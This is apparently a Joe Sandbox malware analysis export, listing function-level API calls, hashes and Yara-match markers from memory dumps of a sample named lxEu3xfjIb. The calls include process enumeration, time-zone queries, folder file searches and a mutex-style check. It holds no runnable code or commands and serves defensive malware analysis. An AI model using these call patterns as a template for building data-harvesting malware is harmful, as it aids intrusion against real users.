                                              • Instruction ID: 78a81fb654212aac759c2e64c5fa6e4ebaf694ebd4499e2bde13b1b2023d66b9
                                              • Opcode Fuzzy Hash: 4dd47c962113320da772e9fd3d5ef9085dc50e719928fc1b4404ad0ba2226614
                                              • Instruction Fuzzy Hash: 57313CB1E01248EBDB14DFE0CC88BEDB779BB44304F104A59E906AA194EB746A48CB52
                                              Function 04858A77 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 0485ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0485ACFF
                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205BF), ref: 04858AC1
                                              • Process32First.KERNEL32(?,00000128), ref: 04858AD5
                                              • Process32Next.KERNEL32(?,00000128), ref: 04858AEA
                                                • Part of subcall function 0485AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0485AF3C
                                                • Part of subcall function 0485AF27: lstrcpy.KERNEL32(00000000), ref: 0485AF7B
                                                • Part of subcall function 0485AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0485AF89
                                                • Part of subcall function 0485AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0485AE7C
                                              • CloseHandle.KERNEL32(?), ref: 04858B58
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                              • String ID:
                                              • API String ID: 1066202413-0
                                              • Opcode ID: 25991fec1edfc484e0ac6d238269bf31d59a6f809c3b303f04a25542f2153d22
                                              • Instruction ID: 0b6d32afa72e70eadeeea201484540d6a34eb93dcd90a964ee334cda6b756317
                                              • Opcode Fuzzy Hash: 25991fec1edfc484e0ac6d238269bf31d59a6f809c3b303f04a25542f2153d22
                                              • Instruction Fuzzy Hash: D93144719012589BDB68EF54DC80FEEB778EF44705F10479AA909E21A0EB706F44CF92
                                              Function 00418950 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E10,00000000,?), ref: 004189BF
                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,00420E10,00000000,?), ref: 004189C6
                                              • wsprintfA.USER32 ref: 004189E0
                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$AllocProcesslstrcpywsprintf
                                              • String ID: %dx%d
                                              • API String ID: 2716131235-2206825331
                                              • Opcode ID: 1a001bca3f565143e81130c797a5c6902db2b2322f06df86b5277f64a988cf2a
                                              • Instruction ID: ec511e81278765dc739de052021e02f912fcc6e2b9c8bb96b49730fbd7d6010e
                                              • Opcode Fuzzy Hash: 1a001bca3f565143e81130c797a5c6902db2b2322f06df86b5277f64a988cf2a
                                              • Instruction Fuzzy Hash: 8B217FB1E45214AFDB00DFD4DC45FAEBBB9FB48710F10411AFA05A7280D779A900CBA5
                                              Function 048BF25E Relevance: 6.1, APIs: 4, Instructions: 60COMMON
                                              Download Yara Rule
                                              APIs
                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 048BF27A
                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 048BF293
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Value___vcrt_
                                              • String ID:
                                              • API String ID: 1426506684-0
                                              • Opcode ID: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                                              • Instruction ID: cff97e85a73899cf75de2c3e639f4305c701361c3274afe4133440f7ede3a56c
                                              • Opcode Fuzzy Hash: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                                              • Instruction Fuzzy Hash: 8601DD36208625DFFB241BB85CC4EDB2754E7016BDB304B2EE725C12E0EFA1A84055C0
                                              Function 04851C57 Relevance: 6.1, APIs: 4, Instructions: 53stringCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExitProcessstrtok_s
                                              • String ID:
                                              • API String ID: 3407564107-0
                                              • Opcode ID: bbbcb8835864335667ee073c6e85149c6edd079fa0b75eecad9fe8ddf8d51a3e
                                              • Instruction ID: 4b07558c121b00ad77cb905b072214e6e1d6e24fef0ce499ec8110a6b7b545d3
                                              • Opcode Fuzzy Hash: bbbcb8835864335667ee073c6e85149c6edd079fa0b75eecad9fe8ddf8d51a3e
                                              • Instruction Fuzzy Hash: D8113D74D00109EFDB04EFE4D948BEDBB74BF44309F108569E915A7260EB706B49CB55
                                              Function 00417B10 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420DE8,00000000,?), ref: 00417B40
                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,00420DE8,00000000,?), ref: 00417B47
                                              • GetLocalTime.KERNEL32(?,?,?,?,?,00420DE8,00000000,?), ref: 00417B54
                                              • wsprintfA.USER32 ref: 00417B83
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$AllocLocalProcessTimewsprintf
                                              • String ID:
                                              • API String ID: 1243822799-0
                                              • Opcode ID: 0540aeb4fecf84a9ec5d2ba81123392b91a3586b08fb2a3d433314a2c6e1e60a
                                              • Instruction ID: c3980473cd5af67d898b1e7796d4e9c7fbcb3b6a311921eeb92eb57329937120
                                              • Opcode Fuzzy Hash: 0540aeb4fecf84a9ec5d2ba81123392b91a3586b08fb2a3d433314a2c6e1e60a
                                              • Instruction Fuzzy Hash: D4112AB2D09218ABCB14DBC9DD45BBEB7B9EB4CB11F10411AF605A2280E3395940C7B5
                                              Function 04857D77 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420DE8,00000000,?), ref: 04857DA7
                                              • RtlAllocateHeap.NTDLL(00000000), ref: 04857DAE
                                              • GetLocalTime.KERNEL32(?,?,?,?,?,00420DE8,00000000,?), ref: 04857DBB
                                              • wsprintfA.USER32 ref: 04857DEA
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$AllocateLocalProcessTimewsprintf
                                              • String ID:
                                              • API String ID: 377395780-0
                                              • Opcode ID: 0540aeb4fecf84a9ec5d2ba81123392b91a3586b08fb2a3d433314a2c6e1e60a
                                              • Instruction ID: c4faadca5719c3712002d90b183c44af5cd82839c99717e311f36e5d504ddfd5
                                              • Opcode Fuzzy Hash: 0540aeb4fecf84a9ec5d2ba81123392b91a3586b08fb2a3d433314a2c6e1e60a
                                              • Instruction Fuzzy Hash: 20112AB2D09218ABCB14DBC9DD45BBEB7B9EB4CB11F10421AF605A2280E2395940C7B5
                                              Function 04857E27 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,006D6C48,00000000,?,00420DF8,00000000,?,00000000,00000000), ref: 04857E5A
                                              • RtlAllocateHeap.NTDLL(00000000), ref: 04857E61
                                              • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,006D6C48,00000000,?,00420DF8,00000000,?,00000000,00000000,?), ref: 04857E74
                                              • wsprintfA.USER32 ref: 04857EAE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                              • String ID:
                                              • API String ID: 3317088062-0
                                              • Opcode ID: ef2e8192f2772f232fc7e7fcc2eea8e627b037badb6437208f4d82c9303bd787
                                              • Instruction ID: 219fc6815d02803744c97b1bafb22e62b4baec81411eed20048f70c1544859d9
                                              • Opcode Fuzzy Hash: ef2e8192f2772f232fc7e7fcc2eea8e627b037badb6437208f4d82c9303bd787
                                              • Instruction Fuzzy Hash: 66118EB1E06228EBEB208B54DC45FA9BB78FB05711F1047EAF619A32D0D7746A408B55
                                              Function 04853AD0 Relevance: 6.0, APIs: 4, Instructions: 45stringCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: strtok_s
                                              • String ID:
                                              • API String ID: 3330995566-0
                                              • Opcode ID: 73115bc3e8dcdeda032c09e7c013334606f369b6221bc6f187dc429dd98a48c5
                                              • Instruction ID: 245e4928704cdbf54503f827af8d62afab9c5803acf0f6e05383f66c49be633c
                                              • Opcode Fuzzy Hash: 73115bc3e8dcdeda032c09e7c013334606f369b6221bc6f187dc429dd98a48c5
                                              • Instruction Fuzzy Hash: 01112A70E002099FDB18CFE9D948BEEB7B9EF04344F008119E915BA260E774A504CF55
                                              Function 048596D7 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateFileA.KERNEL32(04853FA5,80000000,00000003,00000000,00000003,00000080,00000000,?,04853FA5,?), ref: 048596F3
                                              • GetFileSizeEx.KERNEL32(000000FF,04853FA5), ref: 04859710
                                              • CloseHandle.KERNEL32(000000FF), ref: 0485971E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$CloseCreateHandleSize
                                              • String ID:
                                              • API String ID: 1378416451-0
                                              • Opcode ID: 81ae9b57d178cb6c2b2619f3187fe4d96e31a0019182dee87d4c099c60224e91
                                              • Instruction ID: da3f7d67158007c80c7f1be58e2c6b4e790c161403a879fbe987a044988059bd
                                              • Opcode Fuzzy Hash: 81ae9b57d178cb6c2b2619f3187fe4d96e31a0019182dee87d4c099c60224e91
                                              • Instruction Fuzzy Hash: D8F03779E14208FBDB14DFB0EC49B9E77BAAB48704F10C696FA15E72D0E730A6018B40
                                              Function 0484A2F7 Relevance: 6.0, APIs: 4, Instructions: 31libraryloaderCOMMON
                                              Download Yara Rule
                                              APIs
                                              • LoadLibraryA.KERNEL32(004212DC), ref: 0484A2FF
                                              • GetProcAddress.KERNEL32(006D70A8,004212F8), ref: 0484A325
                                              • GetProcAddress.KERNEL32(006D70A8,00421310), ref: 0484A33C
                                              • FreeLibrary.KERNEL32(006D70A8), ref: 0484A360
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AddressLibraryProc$FreeLoad
                                              • String ID:
                                              • API String ID: 2256533930-0
                                              • Opcode ID: 7a0dc9a98ac853a9b738e9b56338bc9d7e27e39a5dbcb03120cd0e56dd10277b
                                              • Instruction ID: 3d2e6ef11a00381cbb2f38f9e74b8cf8336fb7da56e2af45c5f67c2aaef2bea2
                                              • Opcode Fuzzy Hash: 7a0dc9a98ac853a9b738e9b56338bc9d7e27e39a5dbcb03120cd0e56dd10277b
                                              • Instruction Fuzzy Hash: 2CF049B4A4A228EFD7149B68EC08B5537A6F348701F406A26F505CB2E0F3B46084CB22
                                              Function 04856FFA Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                                              Download Yara Rule
                                              APIs
                                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,006D6F40,?,004210F4,?,00000000,?,004210F8,?,00000000,00420AF3), ref: 04856FD1
                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 04856FEF
                                              • CloseHandle.KERNEL32(00000000), ref: 04857000
                                              • Sleep.KERNEL32(00001770), ref: 0485700B
                                              • CloseHandle.KERNEL32(?,00000000,?,006D6F40,?,004210F4,?,00000000,?,004210F8,?,00000000,00420AF3), ref: 04857021
                                              • ExitProcess.KERNEL32 ref: 04857029
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                              • String ID:
                                              • API String ID: 941982115-0
                                              • Opcode ID: cbc054f6a7ed638df2ab0a9ffd5acb2e6cab1cfb1d0e0230c636362dfaef6af4
                                              • Instruction ID: 6912e7a415e686864c9eaf006779315cd3d800ab82204d3494c4fa63dac9ed58
                                              • Opcode Fuzzy Hash: cbc054f6a7ed638df2ab0a9ffd5acb2e6cab1cfb1d0e0230c636362dfaef6af4
                                              • Instruction Fuzzy Hash: FDF05E30E48219EAEB20BBA0DC04B7DB775AB04709F144F15BD16E11F0EBB07500DA63
                                              Function 048BEE4F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON
                                              Download Yara Rule
                                              APIs
                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 048BEE8E
                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 048BEF42
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CurrentImageNonwritable___except_validate_context_record
                                              • String ID: csm
                                              • API String ID: 3480331319-1018135373
                                              • Opcode ID: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                                              • Instruction ID: 9576b1d10e72a484445d8d9340af2b5078824d11f94d6713f68e8ab43ee7da17
                                              • Opcode Fuzzy Hash: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                                              • Instruction Fuzzy Hash: 9941A030A00218DFDB10DF68CC84AEEBBA1EF45318F148A95E859DB391D771E911CBD2
                                              Function 048BF93A Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Catch
                                              • String ID: MOC$RCC
                                              • API String ID: 78271584-2084237596
                                              • Opcode ID: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                                              • Instruction ID: b8136c50e73b0685f0df1b100730467973fae2cc2d015f2006e5dd29856cf6d9
                                              • Opcode Fuzzy Hash: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                                              • Instruction Fuzzy Hash: 9E414931900109AFDF16CF98CD80AEEBBB5FF48308F149659EB44E7220D375A990DB91
                                              Function 004152A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48stringCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00418F70: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418F9B
                                              • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 004152DA
                                              • lstrcatA.KERNEL32(?,02CA5550), ref: 004152F8
                                                • Part of subcall function 00414B60: wsprintfA.USER32 ref: 00414B7C
                                                • Part of subcall function 00414B60: FindFirstFileA.KERNEL32(?,?), ref: 00414B93
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcat$FileFindFirstFolderPathwsprintf
                                              • String ID: 9dA
                                              • API String ID: 2699682494-3568425128
                                              • Opcode ID: 5bb350bcbed3125f7e12a5500a4acbcaef6b2422d52e2d389edcc53ab9aa0019
                                              • Instruction ID: 7a1763d3762e4bc1164bf129b3bea8c613207f41675935a6caeb9cdf66552cef
                                              • Opcode Fuzzy Hash: 5bb350bcbed3125f7e12a5500a4acbcaef6b2422d52e2d389edcc53ab9aa0019
                                              • Instruction Fuzzy Hash: 4E01D6B6E0520867CB14FB71EC53EDE733D9B54305F00419EB64996091EE78ABC8CBA5
                                              Function 0484BCB7 Relevance: 5.3, APIs: 4, Instructions: 284stringCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 0485ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0485ACFF
                                                • Part of subcall function 0485AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0485AF3C
                                                • Part of subcall function 0485AF27: lstrcpy.KERNEL32(00000000), ref: 0485AF7B
                                                • Part of subcall function 0485AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0485AF89
                                                • Part of subcall function 0485AE97: lstrcpy.KERNEL32(00000000,?), ref: 0485AEE9
                                                • Part of subcall function 0485AE97: lstrcat.KERNEL32(00000000), ref: 0485AEF9
                                                • Part of subcall function 0485AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0485AE7C
                                                • Part of subcall function 0485AD17: lstrcpy.KERNEL32(?,00000000), ref: 0485AD5D
                                                • Part of subcall function 0484A7C7: memcmp.MSVCRT(?,0042124C,00000003), ref: 0484A7E4
                                              • lstrlen.KERNEL32(00000000), ref: 0484BED6
                                                • Part of subcall function 04859227: LocalAlloc.KERNEL32(00000040,-00000001), ref: 04859249
                                              • StrStrA.SHLWAPI(00000000,0042143C), ref: 0484BF04
                                              • lstrlen.KERNEL32(00000000), ref: 0484BFDC
                                              • lstrlen.KERNEL32(00000000), ref: 0484BFF0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
                                              • String ID:
                                              • API String ID: 1440504306-0
                                              • Opcode ID: d650cb6ee135051a510d3b4860837fdfb72f530cdecf696837b7b8807095c46b
                                              • Instruction ID: 8f0f20af007fe7730caec973a20f298a4ef90096a82fa3e3efcd8fc71ac52424
                                              • Opcode Fuzzy Hash: d650cb6ee135051a510d3b4860837fdfb72f530cdecf696837b7b8807095c46b
                                              • Instruction Fuzzy Hash: C6B107719001189BDF1CFBA4DC95EED7339AF54209F504B69E906E60A0EFB47A48CB62
                                              Function 00413E2B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16filestringCOMMON
                                              Download Yara Rule
                                              APIs
                                              • lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00413B85
                                              • StrCmpCA.SHLWAPI(?,00420F58), ref: 00413B97
                                              • StrCmpCA.SHLWAPI(?,00420F5C), ref: 00413BAD
                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00413EB7
                                              • FindClose.KERNEL32(000000FF), ref: 00413ECC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Find$CloseFileNextlstrcat
                                              • String ID: q?A
                                              • API String ID: 3840410801-4084695119
                                              • Opcode ID: 0e70d8f007815c078199d768b3eb50a19077b8f7193eafda07f08b5b77a90090
                                              • Instruction ID: 435e47d99a68a60cc5746cb21b8f71e50488397b794716e085ba6dfc691b5c27
                                              • Opcode Fuzzy Hash: 0e70d8f007815c078199d768b3eb50a19077b8f7193eafda07f08b5b77a90090
                                              • Instruction Fuzzy Hash: B3D05B7190411D5BCB10EF64DD489EA7378EB55705F0041CAF40E97150FB349F858F55
                                              Function 048553F7 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 048591D7: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 04859202
                                              • lstrcat.KERNEL32(?,00000000), ref: 04855431
                                              • lstrcat.KERNEL32(?,00421058), ref: 0485544E
                                              • lstrcat.KERNEL32(?,006D6FF8), ref: 04855462
                                              • lstrcat.KERNEL32(?,0042105C), ref: 04855474
                                                • Part of subcall function 04854DC7: wsprintfA.USER32 ref: 04854DE3
                                                • Part of subcall function 04854DC7: FindFirstFileA.KERNEL32(?,?), ref: 04854DFA
                                                • Part of subcall function 04854DC7: StrCmpCA.SHLWAPI(?,00420FC4), ref: 04854E28
                                                • Part of subcall function 04854DC7: StrCmpCA.SHLWAPI(?,00420FC8), ref: 04854E3E
                                                • Part of subcall function 04854DC7: FindNextFileA.KERNEL32(000000FF,?), ref: 04855034
                                                • Part of subcall function 04854DC7: FindClose.KERNEL32(000000FF), ref: 04855049
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                              • String ID:
                                              • API String ID: 2667927680-0
                                              • Opcode ID: 78196317b43d1ae5eb8e9dda45d5cf78e45a1aa527f945a7246ff9d6d1fdb0ea
                                              • Instruction ID: 5a3e4ed684ae709eb0163586438de6cae7b6fcc94c7b2c48ac1a7258c3e727f4
                                              • Opcode Fuzzy Hash: 78196317b43d1ae5eb8e9dda45d5cf78e45a1aa527f945a7246ff9d6d1fdb0ea
                                              • Instruction Fuzzy Hash: F421DA76D00218A7DB54FB74EC45EE9333D9B64700F404B96BA95D21A0EEB46BCC8B92